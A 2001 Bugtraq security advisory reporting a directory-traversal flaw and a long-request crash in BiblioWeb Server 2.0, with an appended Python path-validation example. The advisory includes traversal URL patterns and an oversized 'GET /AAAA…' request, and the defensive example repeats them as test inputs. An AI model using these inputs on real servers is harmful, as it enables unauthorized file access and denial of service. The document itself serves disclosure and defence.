[19006] in bugtraq
Vulnerabilities in BiblioWeb Server
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Feb 5 14:02:20 2001
Message-Id: <200102051740.JAA16326@user7.hushmail.com>
Date: Mon, 5 Feb 2001 12:40:22 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
To Ben Greenbaum:
Please post this advisory instead of the last. I needed to
make a minor change to the 'Vendor Status' section. Thanks.
----------
Vulnerabilities in BiblioWeb Server

Overview

BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com. A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.

Details

To break out of the web root, use the following URLs:

    http://localhost/..\[file outside web root]
    http://localhost/...\[file outside web root]

To crash the server, telnet to port 80, and send:

    GET /[a lot of 'A's]

The server crashes with the following dump:

BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
Registers:
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:

Solution

No quick fix is possible.

Vendor Status

CG Information was contacted via <support@biblioscape.com> on Monday,
January 29, 2001. No reply was received.

- Joe Testa ( e-mail: joetesta@hushmail.com / AIM: LordSpankatron )
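
The two request checks whose absence the advisory describes, as an added example (not part of the original advisory and not BiblioWeb's code): the request target is length-limited, and both '\' and '/' are treated as separators before any all-dot segment such as '..' or '...' is refused. The function name `safe_resolve`, the 2048-byte cap and the sample paths are assumptions made for illustration.

```python
from urllib.parse import unquote

# Assumed upper bound on the request target; the advisory does not state
# the length at which the server crashes.
MAX_TARGET_LEN = 2048


def safe_resolve(web_root, target):
    """Map a request target to a path under web_root, or return None to refuse."""
    if len(target) > MAX_TARGET_LEN:
        return None  # oversized 'GET /AAAA...' request line

    # Drop the query string and decode percent-escapes exactly once.
    path = unquote(target.split("?", 1)[0])
    if "\x00" in path or ":" in path:
        return None  # NUL bytes, drive letters, alternate data streams

    segments = []
    # Windows file APIs accept '\' as a separator, so normalise it to '/'.
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        # Refuse any segment made only of dots and spaces: '..', '...',
        # and variants such as '.. ' that Windows would trim to the same name.
        if seg.strip(". ") == "":
            return None
        segments.append(seg)

    return "/".join([web_root.rstrip("/\\")] + segments)


if __name__ == "__main__":
    # Constructed sample targets mirroring the shapes in the advisory.
    for t in ["/index.html", "/..\\outside.txt", "/...\\outside.txt",
              "/%2e%2e%5coutside.txt", "/" + "A" * 5000]:
        shown = t if len(t) < 40 else t[:20] + "..."
        print(shown, "->", safe_resolve("C:/web", t))
```

Because no segment that could climb out of the root is ever accepted, the returned path is always a descendant of `web_root` by construction, with no reliance on how the operating system later interprets the string.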